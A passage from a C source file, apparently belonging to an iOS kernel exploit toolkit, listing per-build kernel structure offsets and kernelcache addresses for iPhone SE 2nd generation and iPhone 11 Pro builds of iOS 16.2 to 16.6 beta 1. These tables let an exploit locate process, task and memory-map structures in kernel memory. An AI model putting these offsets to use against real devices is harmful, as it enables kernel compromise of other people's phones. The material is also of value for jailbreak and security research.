0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a311178, .kernelcache__gPhysBase = 0xfffffff00785fb98, .kernelcache__gPhysSize = 0xfffffff00785fb98 + 0x8, .kernelcache__gVirtBase = 0xfffffff00785dd78, .kernelcache__perfmon_devices = 0xfffffff00a34c370, .kernelcache__perfmon_dev_open = 0xfffffff007ebcbd8, .kernelcache__ptov_table = 0xfffffff007813260, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a34b800, .kernelcache__vm_pages = 0xfffffff007810088, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007812210, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a34b7f8, .kernelcache__vn_kqfilter = 0xfffffff007f0ef14, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:00 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8030", .build_version = "20D47", .device_id = "iPhone12,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a319178, .kernelcache__gPhysBase = 0xfffffff00785fc80, .kernelcache__gPhysSize = 0xfffffff00785fc80 + 0x8, .kernelcache__gVirtBase = 0xfffffff00785de60, .kernelcache__perfmon_devices = 0xfffffff00a354370, .kernelcache__perfmon_dev_open = 0xfffffff007ec0be8, .kernelcache__ptov_table = 0xfffffff0078132a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a353800, .kernelcache__vm_pages = 0xfffffff0078100c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007812250, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3537f8, .kernelcache__vn_kqfilter = 0xfffffff007f12f14, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:00 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8030", .build_version = "20D67", .device_id = "iPhone12,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a319178, .kernelcache__gPhysBase = 0xfffffff00785fc80, .kernelcache__gPhysSize = 0xfffffff00785fc80 + 0x8, .kernelcache__gVirtBase = 0xfffffff00785de60, .kernelcache__perfmon_devices = 0xfffffff00a354370, .kernelcache__perfmon_dev_open = 0xfffffff007ec0be8, .kernelcache__ptov_table = 0xfffffff0078132a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a353800, .kernelcache__vm_pages = 0xfffffff0078100c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007812250, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3537f8, .kernelcache__vn_kqfilter = 0xfffffff007f12f14, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:25 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8030", .build_version = "20E247", .device_id = "iPhone12,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3d5208, .kernelcache__gPhysBase = 0xfffffff00793bed0, .kernelcache__gPhysSize = 0xfffffff00793bed0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00793a0a8, .kernelcache__perfmon_devices = 0xfffffff00a4134f0, .kernelcache__perfmon_dev_open = 0xfffffff007edf3c8, .kernelcache__ptov_table = 0xfffffff0078ef178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a412990, .kernelcache__vm_pages = 0xfffffff0078ebeb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ee118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a412988, .kernelcache__vn_kqfilter = 0xfffffff007f2df7c, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:25 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8030", .build_version = "20E252", .device_id = "iPhone12,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3d5208, .kernelcache__gPhysBase = 0xfffffff00793bed0, .kernelcache__gPhysSize = 0xfffffff00793bed0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00793a0a8, .kernelcache__perfmon_devices = 0xfffffff00a4134f0, .kernelcache__perfmon_dev_open = 0xfffffff007edf3c8, .kernelcache__ptov_table = 0xfffffff0078ef178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a412990, .kernelcache__vm_pages = 0xfffffff0078ebeb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ee118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a412988, .kernelcache__vn_kqfilter = 0xfffffff007f2df7c, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:28 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8030", .build_version = "20F66", .device_id = "iPhone12,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3e5288, .kernelcache__gPhysBase = 0xfffffff007940010, .kernelcache__gPhysSize = 0xfffffff007940010 + 0x8, .kernelcache__gVirtBase = 0xfffffff00793e1e8, .kernelcache__perfmon_devices = 0xfffffff00a4234f0, .kernelcache__perfmon_dev_open = 0xfffffff007ee35d0, .kernelcache__ptov_table = 0xfffffff0078f3178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a422990, .kernelcache__vm_pages = 0xfffffff0078efeb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f2118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a422988, .kernelcache__vn_kqfilter = 0xfffffff007f3241c, }, // iOS 16.6 beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:02 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8030", .build_version = "20G5026e", .device_id = "iPhone12,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a47dab0, .kernelcache__gPhysBase = 0xfffffff0079541b8, .kernelcache__gPhysSize = 0xfffffff0079541b8 + 0x8, .kernelcache__gVirtBase = 0xfffffff007952370, .kernelcache__perfmon_devices = 0xfffffff00a4bd520, .kernelcache__perfmon_dev_open = 0xfffffff007f07d78, .kernelcache__ptov_table = 0xfffffff0079079b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4bc910, .kernelcache__vm_pages = 0xfffffff007904100, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007906958, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4bc908, .kernelcache__vn_kqfilter = 0xfffffff007f56588, }, // End iPhone SE 2nd // // Start iPhone 11 Pro // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:54 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8030", .build_version = "20C65", .device_id = "iPhone12,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a35d178, .kernelcache__gPhysBase = 0xfffffff00786fb98, .kernelcache__gPhysSize = 0xfffffff00786fb98 + 0x8, .kernelcache__gVirtBase = 0xfffffff00786dd78, .kernelcache__perfmon_devices = 0xfffffff00a398370, .kernelcache__perfmon_dev_open = 0xfffffff007ed4bd8, .kernelcache__ptov_table = 0xfffffff007823260, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a397800, .kernelcache__vm_pages = 0xfffffff007820088, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007822210, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3977f8, .kernelcache__vn_kqfilter = 0xfffffff007f26f14, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:00 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8030", .build_version = "20D47", .device_id = "iPhone12,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a365178, .kernelcache__gPhysBase = 0xfffffff00786fc80, .kernelcache__gPhysSize = 0xfffffff00786fc80 + 0x8, .kernelcache__gVirtBase = 0xfffffff00786de60, .kernelcache__perfmon_devices = 0xfffffff00a3a0370, .kernelcache__perfmon_dev_open = 0xfffffff007ed8be8, .kernelcache__ptov_table = 0xfffffff0078232a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a39f800, .kernelcache__vm_pages = 0xfffffff0078200c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007822250, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a39f7f8, .kernelcache__vn_kqfilter = 0xfffffff007f2af14, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:00 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8030", .build_version = "20D67", .device_id = "iPhone12,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 